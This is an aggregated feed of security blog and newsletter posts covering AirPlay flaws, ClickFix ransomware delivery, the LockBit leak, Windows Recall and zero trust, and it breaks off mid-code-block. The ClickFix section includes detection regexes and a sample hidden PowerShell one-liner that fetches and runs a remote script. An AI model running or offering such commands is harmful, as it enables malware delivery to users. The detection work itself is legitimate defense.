AirBorne: attacks on devices via Apple AirPlay | Kaspersky official blog

Researchers have discovered a series of major security flaws in Apple AirPlay. They’ve dubbed this family of vulnerabilities – and the potential exploits based on them – “AirBorne”. The bugs can be leveraged individually or in combinations to carry out wireless attacks on a wide range of AirPlay-enabled hardware.

We’re mainly talking about Apple devices here, but there are also a number of gadgets from other vendors that have this tech built in – from smart speakers to cars. Let’s dive into what makes these vulnerabilities dangerous, and how to protect your AirPlay-enabled devices from potential attacks.

What is Apple AirPlay?

First, a little background. AirPlay is an Apple-developed suite of protocols used for streaming audio and, increasingly, video between consumer devices. For example, you can use AirPlay to stream music from your smartphone to a smart speaker, or mirror your laptop screen on a TV.

All this happens wirelessly: streaming typically uses Wi-Fi, or, as a fallback, a wired local network. It’s worth noting that AirPlay can also operate without a centralized network – be it wired or wireless – by relying on Wi-Fi Direct, which establishes a direct connection between devices.

AirPlay Video and AirPlay Audio logos

AirPlay logos for video streaming (left) and audio streaming (right). These should look familiar if you own any devices made by the Cupertino company. Source

Initially, only certain specialized devices could act as AirPlay receivers. These were AirPort Express routers, which could stream music from iTunes through the built-in audio output. Later, Apple TV set-top boxes, HomePod smart speakers, and similar devices from third-party manufacturers joined the party.

However, in 2021, Apple decided to take things a step further – integrating an AirPlay receiver into macOS. This gave users the ability to mirror their iPhone or iPad screens on their Macs. iOS and iPadOS were next to get AirPlay receiver functionality – this time to display the image from Apple Vision Pro mixed-reality headsets.

AirPlay works with Wi-Fi Direct

AirPlay lets you stream content either over your regular network (wired or wireless), or by setting up a Wi-Fi Direct connection between devices. Source

CarPlay, too, deserves a mention, being essentially a version of AirPlay that’s been adapted for use in motor vehicles. As you might guess, the vehicle’s infotainment system is what receives the stream in the case of CarPlay.

So, over two decades, AirPlay has gone from a niche iTunes feature to one of Apple’s core technologies that underpins a whole bunch of features in the ecosystem. And, most importantly, AirPlay is currently supported by hundreds of millions, if not billions, of devices, and many of them can act as receivers.

What’s AirBorne, and why are these vulnerabilities a big deal?

AirBorne is a whole family of security flaws in the AirPlay protocol and the associated developer toolkit – the AirPlay SDK. Researchers have found a total of 23 vulnerabilities, which, after review, resulted in 17 CVE entries being registered. Here’s the list, just to give you a sense of the scale of the problem:

  1. CVE-2025-24126
  2. CVE-2025-24129
  3. CVE-2025-24131
  4. CVE-2025-24132
  5. CVE-2025-24137
  6. CVE-2025-24177
  7. CVE-2025-24179
  8. CVE-2025-24206
  9. CVE-2025-24251
  10. CVE-2025-24252
  11. CVE-2025-24270
  12. CVE-2025-24271
  13. CVE-2025-30422
  14. CVE-2025-30445
  15. CVE-2025-31197
  16. CVE-2025-31202
  17. CVE-2025-31203
AirBorne vulnerability family logo

You know how any serious vulnerability with a modicum of self-respect needs its own logo? Yeah, AirBorne’s got one too. Source

These vulnerabilities are quite diverse: from remote code execution (RCE) to authentication bypass. They can be exploited individually or chained together. So, by exploiting AirBorne, attackers can carry out the following types of attacks:

Example of an attack that exploits the AirBorne vulnerabilities

The most dangerous of the AirBorne security flaws is the combination of CVE-2025-24252 with CVE-2025-24206. In concert, these two can be used to successfully attack macOS devices and enable RCE without any user interaction.

To pull off the attack, the adversary needs to be on the same network as the victim, which is realistic if, for example, the victim is connected to public Wi-Fi. In addition, the AirPlay receiver has to be enabled in macOS settings, with Allow AirPlay for set to either Anyone on the Same Network or Everyone.

Successful zero-click attack on macOS via AirBorne

The researchers carried out a zero-click attack on macOS, which resulted in swapping out the pre-installed Apple Music app with a malicious payload. In this case, it was an image with the AirBorne logo. Source

What’s most troubling is that this attack can spawn a network worm. In other words, the attackers can execute malicious code on an infected system, which will then automatically spread to other vulnerable Macs on any network patient zero connects to. So, someone connecting to free Wi-Fi could inadvertently bring the infection into their work or home network.

The researchers also demonstrated other attacks leveraging AirBorne. These include another macOS attack allowing RCE, which requires a single user action but works even if Allow AirPlay for is set to the more restrictive Current User option.

The researchers also managed to attack a smart speaker through AirPlay, achieving RCE without any user interaction and regardless of any settings. This attack could also turn into a network worm, where the malicious code spreads from one device to another on its own.

Successful zero-click attack on a smart speaker via AirBorne

Hacking an AirPlay-enabled smart speaker by exploiting AirBorne vulnerabilities. Source

Finally, the researchers explored and tested out several attack scenarios on car infotainment units through CarPlay. Again, they were able to achieve arbitrary code execution without the car owner doing anything. This type of attack could be used to track someone’s movements or eavesdrop on conversations inside the car. Then again, you might remember that there are simpler ways to track and hack cars.

Successful zero-click attack on a vehicle via a CarPlay vulnerability

Hacking a CarPlay-enabled car infotainment system by exploiting AirBorne vulnerabilities. Source

Staying safe from AirBorne attacks

The most important thing you can do to protect yourself from AirBorne attacks is to update all your AirPlay-enabled devices. In particular, do this:

  • Update iOS to version 18.4 or later.
  • Update macOS to Sequoia 15.4, Sonoma 14.7.5, Ventura 13.7.5, or later.
  • Update iPadOS to version 17.7.6 (for older iPads), 18.4, or later.
  • Update tvOS to version 18.4 or later.
  • Update visionOS to version 2.4 or later.

As an extra precaution, or if you can’t update for some reason, it’s also a good idea to do the following:

  1. Disable the AirPlay receiver on your devices when you’re not using it. You can find the required setting by searching for “AirPlay”.
AirPlay settings in iOS to protect against AirBorne attacks

How to configure AirPlay in iOS to protect against attacks that exploit the AirBorne family of vulnerabilities

  2. Restrict who can stream to your Apple devices in the AirPlay settings on each of them. To do this, set Allow AirPlay for to Current User. This won’t rule out AirBorne attacks completely, but it’ll make them harder to pull off.
AirPlay settings in macOS to protect against AirBorne attacks

How to configure AirPlay in macOS to protect against attacks that exploit the AirBorne family of vulnerabilities

  3. Install a reliable security solution on all your devices. Despite the popular myth, Apple devices aren’t cyber-bulletproof and need protection too.

What other vulnerabilities can Apple users run into? These are just a few examples:

Kaspersky official blog – Read More

Ransomware group uses ClickFix to attack businesses

The ransomware group Interlock has started using the ClickFix technique to gain access to its victims’ infrastructure. In a recent post, we discussed the general concept of ClickFix. Today we’ll look at a specific case where a ransomware group has put this tactic into action. Cybersecurity researchers have discovered that Interlock is using a fake CAPTCHA imitating a Cloudflare-protected site on a page posing as the website of Advanced IP Scanner — a popular free network scanning tool. This suggests the attack is aimed at IT professionals working in organizations of potential interest to the group.

How Interlock is using ClickFix to spread malware

The Interlock attackers lure victims to a webpage with a URL mimicking that of the official Advanced IP Scanner site. The researchers found multiple instances of the same page hosted at different addresses across the web.

When the user clicks the link, they see a message asking them to complete a CAPTCHA, seemingly provided by Cloudflare. The message states that Cloudflare helps companies “regain control of their technology”. This legitimate-looking marketing text is in fact copied from Cloudflare’s own What is Cloudflare? webpage. It’s followed by instructions to press Win + R, then Ctrl + V, and finally Enter. Next come two buttons: Fix it and Retry.

Finally, a message claims that the resource the victim is trying to access needs to verify the connection’s security.

In reality, when the victim clicks Fix it, a malicious PowerShell command is copied to the clipboard. The user then unknowingly opens the command console with Win + R and pastes the command with Ctrl + V. Pressing Enter then executes the malicious command.
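The sequence described above (a command staged in the clipboard, then pasted into the Run dialog) leaves traces defenders can hunt for. Below is a hedged Python sketch of a simple indicator check; the pattern list is an illustrative assumption, not a tested detection rule:

```python
import re

# A hedged sketch (not a production detector): heuristics for spotting
# ClickFix-style commands, e.g. in clipboard history or in the Windows
# RunMRU registry key that records Win+R input. The indicator list is
# illustrative, not exhaustive.
SUSPICIOUS_PATTERNS = [
    r"powershell(\.exe)?\s+-w(indowstyle)?\s*hidden",  # hidden PowerShell window
    r"-enc(odedcommand)?\s+[a-z0-9+/=]{20,}",          # Base64-encoded payload
    r"(iwr|invoke-webrequest|curl)\s+https?://",       # download cradle
    r"iex\b|invoke-expression",                        # in-memory execution
    r"mshta\s+https?://",                              # mshta-based variants
]

def looks_like_clickfix(command: str) -> bool:
    """Return True if the command matches any ClickFix-style indicator."""
    lowered = command.lower()
    return any(re.search(p, lowered) for p in SUSPICIOUS_PATTERNS)

# The kind of one-liner a fake CAPTCHA page might plant in the clipboard
# (example.invalid is a placeholder domain):
sample = 'powershell -w hidden -c "iwr https://example.invalid/x.ps1 | iex"'
print(looks_like_clickfix(sample))         # True
print(looks_like_clickfix("notepad.exe"))  # False
```

On Windows, commands entered via Win + R are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which makes this kind of check useful in post-incident triage.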

Executing the command downloads and launches a 36-megabyte fake installer built with PyInstaller. To distract the victim, a browser window with the real Advanced IP Scanner website opens.

From data collection to extortion: the stages of an Interlock attack

Once the fake installer is launched, a PowerShell script is activated that collects system information and sends it to a C2 server. In response, the server can either send the ooff command to terminate the script, or deliver additional malware. In this case the attackers used Interlock RAT (remote access Trojan) as the payload. The malware is saved in the %AppData% folder and runs automatically, allowing the attackers to access confidential data and establish persistence in the system.

After initial access, the Interlock operators try to use previously stolen or leaked credentials and the Remote Desktop Protocol (RDP) for lateral movement. Their primary target is the domain controller (DC) — gaining access to it allows the attackers to spread malware across the infrastructure.

The final step before launching the ransomware is to steal the victim organization’s valuable data. These files are uploaded to Azure Blob Storage controlled by the attackers. After exfiltrating the sensitive data, the Interlock group publishes it on a new Tor domain. A link to this domain is then provided in a new post on the group’s .onion site.

Ransom note from the Interlock ransomware group

Example of a ransom note sent by the Interlock ransomware group. Source

How to protect against ClickFix attacks

ClickFix and other similar techniques rely heavily on social engineering, so the best protection is a systematic approach focused primarily on raising employee awareness. To help with this, we recommend our Kaspersky Automated Security Awareness Platform, which automates training programs for staff.

In addition, to protect against ransomware attacks, we recommend the following:

Kaspersky official blog – Read More

Sednit abuses XSS flaws to hit gov’t entities, defense companies

Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU

WeLiveSecurity – Read More

Xoxo to Prague

Welcome to this week’s edition of the Threat Source newsletter. 

I haven’t been to Prague in a while, which is a pity. It’s a wonderful city — great people, amazing food. I’ve visited customers there, held team meetings at the local office (shoutout to Petr!) and spent some memorable summer days off. But none of those are why I’m sending my greetings this time. 

Last week, anyone trying to access LockBit’s dark web affiliate panels was greeted by a defaced page with the message: 

“Don’t do crime CRIME IS BAD xoxo from Prague” 

Alongside the message was a download link for a compressed archive called “paneldb_dump.zip” —  a 7.5MB file that extracts to a 26MB clear-text SQL dump containing 20 tables. The breach exposed a rare, unfiltered look into LockBit’s operations. 

While most articles focused on the nearly 60,000 Bitcoin addresses or the credentials for 75 admins and affiliates (all with plaintext passwords), I have to admit that I was mesmerized by the “chats” table. With 4,423 messages spread across 208 victims and spanning December 2024 to April 2025, these chats reveal the raw tactics, ransom demands and negotiation strategies of both affiliates and victims. Sometimes there was just a single unanswered message; in other cases, over 300 messages included “technical support” for unrecoverable files, and even requests for refunds.

Ransom demands varied widely, from just a few thousand dollars to as much as $2 million in one notable case. There were also several instances of confusion — some mistakenly thought the demand was “100,000 bitcoins” when it was actually “100,000 dollars in bitcoin.” Additionally, there was a case involving a hosting company breach, where it was the company’s customers who ultimately suffered the consequences. The chat exposed that LockBit had encrypted all the data with a single key; since not every affected customer was willing or able to pay, LockBit insisted the hoster pay the full amount, which made the ransom difficult to collect.
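Digging through a dump like this is mostly SQL work. Here is a hypothetical sketch of the kind of triage query involved; the table and column names (chats, victim_id, sent_at, body) are assumptions for illustration, not the actual schema of the leaked database:

```python
import sqlite3

# A hypothetical sketch of triaging a leaked "chats" table. The column
# names (victim_id, sent_at, body) are assumptions for illustration;
# the real dump's schema may differ.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE chats (victim_id TEXT, sent_at TEXT, body TEXT)")
conn.executemany(
    "INSERT INTO chats VALUES (?, ?, ?)",
    [
        ("v1", "2024-12-20", "Pay 100,000 dollars in bitcoin."),
        ("v1", "2024-12-21", "We need more time to gather funds."),
        ("v2", "2025-04-01", "Deadline passed. The price doubles now."),
    ],
)

# Messages per victim: a quick way to separate single unanswered messages
# from long negotiations (the real dump reportedly ranged from 1 to 300+).
rows = conn.execute(
    "SELECT victim_id, COUNT(*) AS n FROM chats GROUP BY victim_id ORDER BY n DESC"
).fetchall()
print(rows)  # [('v1', 2), ('v2', 1)]
```

The same grouping approach extends naturally to ransom amounts per victim or message volume over time.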

Negotiations were often pressured by tight deadlines, and European bank holidays on Good Friday, Easter Monday and May 1 complicated the situation further. In several cases, the ransom demand increased once a deadline passed. I even found messages from victims asking for more time so they could gather funds in smaller amounts to avoid detection under local anti-money laundering laws.

In another chat, a victim tried to negotiate by pleading inability to pay a $100k ransom, only to be told, “Seven directors at 14k can’t chime in?” This clearly shows that the “Analytics Department” of LockBit did their homework. 

The level of “trust” placed in affiliates was also striking. Messages included:

Screenshot: messages from the leaked LockBit affiliate panel

Interestingly, that last service was offered for an extra fee. Let me share some of their $10,000 “tips” for free:

Screenshot: LockBit’s $10,000 “tips” from the leaked panel

With these $10,000 tips, I personally think it would be better to get advice before an incident from Talos Incident Response. They can also provide guidance and proactive support as part of the Talos IR Retainer.

The LockBit leak is a rare window into the mechanics of cybercrime and the human stories behind the headlines. And, for now, xoxo to Prague.

The one big thing 

Cisco Talos has observed a growing trend of attack kill chains being split into two stages — initial compromise and subsequent exploitation — executed by separate threat actors. In response to these evolving threats, we have refined the definitions of initial access brokers (IABs) to include subcategories such as financially-motivated initial access (FIA), state-sponsored initial access (SIA), and opportunistic initial access (OIA).   

Why do I care? 

This trend complicates traditional threat modeling and actor profiling, as it requires understanding the intricate relationships and interactions between various groups. For example, hunting and containment strategies that may defend against one type of IAB may not be suitable for another. 

So now what? 

We have identified several methods for analyzing compartmentalized attacks and propose an extended Diamond Model, which adds a “Relationship Layer” to enrich the context of the relationships between the four features. Familiarize yourself with the new taxonomy we propose, and incorporate this new methodology for modeling and tracking compartmentalized threats into your toolkit. 

Top security headlines of the week 

Operation Moonlander  
A criminal proxy network that had been around for more than 20 years, built on thousands of infected IoT and end-of-life (EoL) devices, was dismantled in an international operation. (U.S. Attorney’s Office)

Supply Chain Compromise  
A deprecated Node.js package with more than 40k downloads per week, ‘rand-user-agent’, has been compromised with a malicious payload dubbed “RATatouille”. This is a clear case of a supply chain attack. (Aikido)

Ascension Health Data Breach Impacts Over 430,000 
Healthcare provider Ascension has disclosed a data breach affecting over 430,000 patients. (Bleeping Computer)

Germany Shuts Down eXch Over $1.9B Laundering 
German authorities have shut down the cryptocurrency mixer eXch due to its alleged involvement in laundering approximately $1.9 billion in illicit funds, seizing a large amount of cryptocurrency and data. (BKA, German language)

Can’t get enough Talos? 

Talos Takes
Follow the motive: Rethinking defense against Initial Access Groups. Listen here.

Talos in the news
Initial Access Brokers Target Brazil Execs via NF-e Spam and Legit RMM Trials (The Hacker News)

Why MFA is getting easier to bypass and what to do about it (Ars Technica)

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week  

SHA 256: e00aa8146cf1202d8ba4fffbcf86da3c6d8148a80bb6503d89b0db2aa9cc0997 
MD5: eae884415e5fd403e4f1bf46f90df0be 
VirusTotal: https://www.virustotal.com/gui/file/e00aa8146cf1202d8ba4fffbcf86da3c6d8148a80bb6503d89b0db2aa9cc0997  
Typical Filename: paneldb_dump.zip 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Typical Filename: VID001.exe 
Claimed Product: N/A 
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 
MD5: 7bdbd180c081fa63ca94f9c22c457376 
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A 
Detection Name: Trojan.GenericKD.33515991 

Cisco Talos Blog – Read More

Microsoft Copilot+ Recall: who should disable it, and how | Kaspersky official blog

When Microsoft first announced its “photographic memory” Recall feature for Copilot+ PCs a year ago, cybersecurity experts were swift in sounding the alarm. Recall’s many flaws posed a serious threat to privacy, prompting Microsoft to postpone its release for further refinement. The updated Recall came to Windows Insider Preview builds in April 2025, and was rolled out widely in May on devices equipped with the necessary hardware. The essence remains the same: Recall memorizes all your actions by continuously taking screenshots and using OCR to analyze their content. However, with the latest update, the security of this data has been significantly enhanced. How much difference does this actually make? And is the convenience of Recall really worth the potential loss of control over your personal data?

What’s new in Recall’s second coming

Since the initial announcement, which we covered in detail, Microsoft has addressed several key criticisms raised by cybersecurity professionals.

First, Recall now only activates with user permission during the initial system setup. The interface doesn’t manipulate users into agreeing with visual tricks like highlighting the “Yes” button.

Second, Recall’s database files are now encrypted, with key storage and cryptographic operations handled by the hardware-based TPM (Trusted Platform Module), making their extraction significantly more difficult.

Third, a special filter attempts to prevent saving screenshots or text when the screen contains potentially sensitive information — a private browser window, a payment data input form, password manager cards, and so on. Note it only “attempts”: testers have already reported numerous instances where confidential data slipped through the filter and ended up in the OCR database.

Ars Technica highlights several other positive changes:

  • Recall is enabled for each PC user individually, rather than everyone at once.
  • Recall can be uninstalled completely.
  • A Microsoft account isn’t required.
  • No internet connection is needed — all data is processed locally.
  • To initially launch Recall, BitLocker disk encryption and Windows Hello biometric authentication (face or fingerprint recognition) must be enabled.
  • Windows Hello authentication is required every time the Recall search is used.

Why Recall still poses risks

Microsoft has indeed put some effort into responding to the criticism. However, the current version of Recall still has a number of issues.

First, biometric authentication is only required during the initial setup of Recall. For subsequent launches, the AI assistant will also ask to confirm your identity, but presenting your face or fingerprint is no longer necessary. A regular Windows PIN will suffice, and it’s relatively easy for someone to take a peek at, or guess, your PIN, no matter whether you’re at home or at work. One reviewer admits to asking his girlfriend to find a screenshot of a specific Signal chat on his computer — she guessed the password and found the screenshot in just five minutes.

Second, Recall can also be re-activated without biometrics. If the account owner tried Recall but then disabled it, anyone who knows the PIN can re-enable screenshot capture and smart search. All that’s left is to wait a little while, log back in, and browse the results.

Third, as mentioned, automatic filtering of sensitive data is unreliable. In theory, Recall doesn’t take screenshots in many high-risk scenarios: when a browser window is opened in private mode, when remote access to another desktop is active, when entering payment info or passwords, and also on additional inactive displays and desktops. In practice, these situations aren’t always recognized — for example, the filter fails to detect the private mode in not-so-common browsers (such as Vivaldi) and remote desktops, including those accessed with the hugely popular AnyDesk.

Finally — and this deserves a whole category of its own — Recall meticulously logs the computer owner’s interactions with other users, potentially violating both their privacy rights and the data retention policies of messaging and collaboration tools. For example, if the computer owner is in a Zoom or Teams call with automatic transcription enabled, Recall will save a full recording of the call with a transcript of who said what. If a self-destructing WhatsApp or Signal chat is open on screen, Recall will save it anyway, despite the chat’s privacy policies. Photos and videos intended for one-time viewing will also be stored if just one person in the conversation uses Recall.

All of this matters in two dangerous scenarios: (i) when someone who knows (or can guess) the PIN gains unauthorized physical access to the computer; and (ii) when an attacker exploiting Windows vulnerabilities gains remote access to it. Year after year, despite the tightening of security measures, hackers keep finding ways to elevate privileges on compromised machines and exfiltrate information — even encrypted data.

Impact on performance and battery life

Although Recall was originally designed for high-performance PCs equipped with a dedicated AI chip (NPU) — only found in models released over the past 12 months — capturing and processing screenshots can still interfere with the user experience even on these powerful machines. This is particularly noticeable when gaming, as Recall diligently takes screenshots and records in-game dialogue, consuming significant memory and computing resources and loading the NPU at up to 80%. Even when the device isn’t plugged in (but the battery is almost fully charged), Recall keeps working, draining the battery much faster than usual.

Who should disable or remove Recall?

Microsoft is now offering users a fair choice: enable Recall, ignore it, or completely remove it from the computer. This is a much better approach than its previous campaigns to push Edge, Cortana, or Windows Media Player. If you see a screen prompting you to enable Recall, consider whether you fall into one of these categories:

  • Anyone working with trade secrets, other people’s confidential data, or personal data in general (e.g., lawyers, doctors, and other professionals).
  • Active users of video conferencing, remote tech-support services, or other tech involving the handling of others’ information.
  • People engaged in particularly private correspondence — especially using secure messengers and disappearing chats/messages.
  • Individuals living with jealous or nosy family members, or working in an office with overly curious colleagues.

For all these users, we recommend steering clear of Recall — or, better yet, removing it entirely.

How to disable or remove Recall

To disable Recall:

  1. Open Settings in the Windows Start menu and select Privacy & security.
  2. Within Privacy & security, find the Recall & snapshots subsection.
  3. In this subsection, toggle off Save snapshots, and click Delete snapshots to erase any data already collected.
How to disable Microsoft Copilot+ Recall

How to disable Microsoft Copilot+ Recall and delete any stored data. Source

To remove Recall completely:

  1. In the Windows Start menu search bar, type Turn Windows features on or off.
  2. In the retro-looking window that opens, locate the Recall entry.
  3. Uncheck the box next to this item and click OK.

After this, Recall will be removed from your PC, and its settings will no longer appear under Privacy & security.

How to remove Microsoft Copilot+ Recall completely

How to remove Microsoft Copilot+ Recall from your computer completely. Source

How to configure Recall if you decide to try it anyway

If you don’t fall into any of the categories above and really want to Recall something like “the photo where Jane’s cat is lying on the blue sofa”, we recommend taking a few precautions and adjusting your settings for better security:

  • Disable less secure sign-in methods in Windows, such as pattern locks and PINs. Use only a strong password and biometric authentication.
  • Manually add to Recall’s exclusion list all messengers you use for confidential correspondence, password managers, finance apps and websites, and any other apps or websites that may contain private information. For ethical reasons, it’s a good idea to exclude all video conferencing apps. For performance reasons, exclude all games.
  • Set a screenshot retention period that suits your needs, keeping it to a minimum. Possible options range from 30 to 180 days.
  • Periodically — ideally a few times a week — check Recall to see which apps and sites were recently captured. This will help you identify and manually delete or filter out any sources of sensitive information you may have missed earlier.

Regardless of your Recall settings or whether it’s installed at all, the two most common data leak scenarios are direct theft from your device by infostealer malware, and entering your credentials on a phishing site. To guard against these risks, be sure to use a comprehensive cybersecurity solution, such as Kaspersky Premium.

Under the pretense of user convenience — and sometimes without any pretense at all — various organizations collect information about you that you may not even be aware of. How? Read here:

Kaspersky official blog – Read More

How Malware Analysis Training Powers Up SOC and MSSP Teams

Security Operations Centers (SOCs) and Managed Security Service Providers (MSSPs) serve as the frontline defenders for organizations worldwide. These teams operate in high-pressure environments, analyzing security incidents, monitoring threats, and responding to attacks in real time. Continuous learning — especially through hands-on malware analysis training — is not just beneficial but essential to their performance.

Educational programs from experienced industry players, such as ANY.RUN’s Security Training Lab, significantly enhance the capabilities of these teams, driving efficiency, expertise, and business value.  

How SOCs and MSSPs Operate 

SOCs and MSSPs are structured around continuous threat detection and incident response. SOCs are in-house teams that monitor an organization’s networks, systems, and endpoints 24/7. MSSPs offer similar services to multiple clients on a contractual basis. Both rely on skilled analysts and threat hunters to interpret complex data, prioritize alerts, and mitigate attacks before they cause damage. 

Efficiency in these teams depends on collaboration between tiers of analysts, threat intelligence integration, and the ability to act fast on accurate, contextual information. But to be truly effective, teams must go beyond automated alerts and develop a deep understanding of threats — including the malware behind them. 

Why Continuous Learning Matters 

Attackers constantly adapt their techniques, whether through obfuscation, living-off-the-land tactics, or leveraging zero-day vulnerabilities. Without ongoing training, even the most experienced analysts can fall behind. 

Continuous learning keeps cybersecurity professionals current on new attack vectors, IOCs, and detection methods. It also builds confidence and readiness in handling new threats. For organizations, this promises faster response times, fewer false positives, and more resilient defenses. 

SOCs and MSSPs: different workflows, same need for practical training
🛡 SOC Tasks Requiring Malware Analysis Training
(Internal, organization-focused operations)

  • Investigate endpoint infections to trace malware entry and behavior
  • Analyze suspicious files and email attachments flagged by EDR/XDR
  • Correlate logs and IOCs to confirm ongoing attacks
  • Refine detection rules (e.g., YARA, SIEM correlation) based on malware TTPs
  • Support incident response playbooks with updated malware knowledge
  • Simulate attack scenarios to test internal defenses against known malware
  • Perform post-incident forensic analysis for internal audits and reporting

🌐 MSSP Tasks Requiring Malware Analysis Training
(Multi-client, service-driven operations)

  • Analyze malware artifacts from multiple client environments
  • Identify zero-day threats across diverse networks
  • Enrich threat intelligence feeds with behavior-based indicators
  • Develop client-specific detection content (custom alerts, signatures)
  • Prioritize alerts and escalations using malware behavior context
  • Provide detailed incident reports explaining malware operations to clients
  • Proactively hunt for new threats across managed client infrastructure
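Several of the tasks above revolve around detection content such as YARA rules and custom signatures. As an illustrative sketch (not a real YARA engine), the core idea of matching string indicators under a condition looks like this; the indicator strings are toy examples borrowed from the Interlock write-up earlier in this digest:

```python
# An illustrative sketch, not a real YARA engine: the core idea behind a
# string-based detection rule is counting indicator hits against a condition.
# The strings below are toy indicators (the "ooff" C2 command and the
# %AppData% drop location mentioned in the Interlock case).
RULE = {
    "name": "demo_interlock_like",
    "strings": [b"ooff", b"AppData", b"powershell"],
    "condition": 2,  # flag the sample if at least 2 indicators are present
}

def matches(rule: dict, sample: bytes) -> bool:
    hits = sum(1 for s in rule["strings"] if s in sample)
    return hits >= rule["condition"]

benign = b"hello world"
suspicious = b"copies itself to AppData, then waits for the ooff command"
print(matches(RULE, benign), matches(RULE, suspicious))  # False True
```

Real YARA rules add hex patterns, regexes, and richer condition logic, but the hit-counting principle is the same.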
What They Have in Common
✅ Require hands-on training with real-world malware

✅ Need visibility into malware behavior (e.g., process trees, network activity)

✅ Rely on fast, accurate triage and threat validation

✅ Benefit from platforms like ANY.RUN Security Training Lab for safe, interactive analysis

✅ Aim to improve detection and response times through deep threat understanding

The Role of Real-World Malware Analysis 

Among the most impactful forms of learning is hands-on malware analysis. Unlike sanitized textbook examples, real malware samples expose actual tools, behaviors, and evasion techniques used by threat actors. 

This kind of analysis helps SOC and MSSP teams develop a proactive rather than reactive security posture.

Training on real malware helps analysts not only recognize threats but also understand their mechanics and impact, which is crucial for effective countermeasures. Moreover, exposure to community-submitted malware, as facilitated by services like ANY.RUN, illustrates current challenges faced by organizations worldwide and ensures that training remains relevant, aligned with the latest attack trends.  

This practical focus empowers SOC and MSSP teams to respond effectively to incidents, reducing the risk of operational disruption or data breaches. 

Continuous learning also fosters a culture of adaptability, critical for teams operating in high-pressure environments. Mastering advanced analysis techniques, such as debugging or reverse engineering, equips analysts to dissect complex malware, reducing the time needed to understand and neutralize threats. This efficiency translates to lower mean time to detect (MTTD) and mean time to respond (MTTR), key metrics for SOC and MSSP performance.  

Ongoing education supports career progression, boosting morale and retention among analysts, which is vital given the industry’s talent shortage. By investing in continuous learning, SOCs and MSSPs ensure their teams remain agile, competent, and prepared for the next wave of cyber threats. 

How ANY.RUN’s Security Training Lab Supports Practical Learning 

ANY.RUN’s Security Training Lab is built to bridge the gap between theory and practice. It offers an isolated, interactive environment where users can safely analyze live malware samples without risk to their infrastructure. Users can observe how malware behaves in real time, test detection strategies, and simulate incident response scenarios. 

Level up malware analysis expertise in your team with ANY.RUN’s Security Training Lab: Contact us.


Key benefits include: 

  • A 30-hour interactive digital course comprising written materials, video lectures, tasks, and tests, structured into ten modules that cover critical aspects of malware analysis
  • A realistic training ground using actual malware strains
  • Tools that mirror real-world SOC environments
  • Support for inter-industry collaboration
Contents and modules of the Security Training Lab program 

The Security Training Lab is scalable and flexible, and supports self-paced, instructor-led, and hybrid learning formats. Instructors can track the progress of their students and assess practical skills, ensuring that training outcomes are measurable and aligned with organizational goals.  

Learners also gain unlimited access to the sandbox and a repository of fresh malware samples submitted by ANY.RUN’s global user community, including 15,000 corporate security teams.  

Example of a practical task with a malware sample from ANY.RUN’s Sandbox 

Raising Cybersecurity Expertise — and Business Value 

When SOC and MSSP analysts become more adept through real-world training, the entire organization benefits. Skilled teams: 

  • Reduce mean time to detect and respond (MTTD/MTTR); 
  • Lower the risk of breaches and data loss; 
  • Enhance client trust (especially for MSSPs); 
  • Optimize ROI through improved service levels. 
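As a rough illustration of the MTTD/MTTR metrics mentioned above, here is a minimal Python sketch; the incident records and field names are invented for the example:

```python
from datetime import datetime

# Sketch: mean time to detect (onset -> detected) and mean time to respond
# (detected -> resolved), in minutes, over a set of incident records.
incidents = [
    {"onset": datetime(2025, 5, 1, 9, 0), "detected": datetime(2025, 5, 1, 9, 30),
     "resolved": datetime(2025, 5, 1, 11, 0)},
    {"onset": datetime(2025, 5, 2, 14, 0), "detected": datetime(2025, 5, 2, 14, 10),
     "resolved": datetime(2025, 5, 2, 15, 10)},
]

def mean_minutes(pairs) -> float:
    deltas = [(b - a).total_seconds() / 60 for a, b in pairs]
    return sum(deltas) / len(deltas)

mttd = mean_minutes((i["onset"], i["detected"]) for i in incidents)
mttr = mean_minutes((i["detected"], i["resolved"]) for i in incidents)
```

Tracking these numbers before and after a training program is one simple way to make its business value measurable.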

Investing in continuous, practical training is not just an HR initiative — it’s a business decision. It strengthens operational security, reduces incident costs, and builds a reputation for reliability and resilience. 

Conclusion 

In the arms race between defenders and attackers, the best defense is a well-trained team. For SOCs and MSSPs, regular exposure to real-world malware and hands-on analysis tools is a powerful way to sharpen skills, improve performance, and protect what matters. ANY.RUN’s Security Training Lab offers practical training that elevates team expertise and delivers measurable business outcomes. 

About ANY.RUN

ANY.RUN supports over 15,000 organizations across numerous industries, including banking, manufacturing, and healthcare. Our interactive malware analysis and threat intelligence tools allow companies and SOC teams to speed up their threat investigations, ensure proactive security, and build stronger and more resilient operations.

The post How Malware Analysis Training Powers Up SOC and MSSP Teams appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

How to implement zero trust: first steps and success factors

This year marks the 15th anniversary of the first guide to implementing the zero trust security concept, which, according to a Gartner survey, almost two-thirds of surveyed organizations have adopted to some extent. Admittedly (in the same Gartner survey), for 58% of them this transition is far from complete, with zero trust covering less than half of infrastructure. Most organizations are still at the stage of piloting solutions and building the necessary infrastructure. To join the vanguard, you need to plan the transition to zero trust with eyes wide open to the obstacles that lie ahead, and to understand how to overcome them.

Zero trust best practices

Zero trust is a security architecture that views all connections, devices, and applications as untrusted and potentially compromised — even if they’re part of the organization’s internal infrastructure. Zero trust solutions deliver continuous adaptive protection by re-verifying every connection and transaction based on a potentially changed security context. This way, companies can mold their information security to the real-world conditions of hybrid cloud infrastructures and remote working.
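As a toy illustration of that re-verification loop (this is not any specific product’s policy engine; the signal names and thresholds are invented), a zero-trust access decision can be sketched as:

```python
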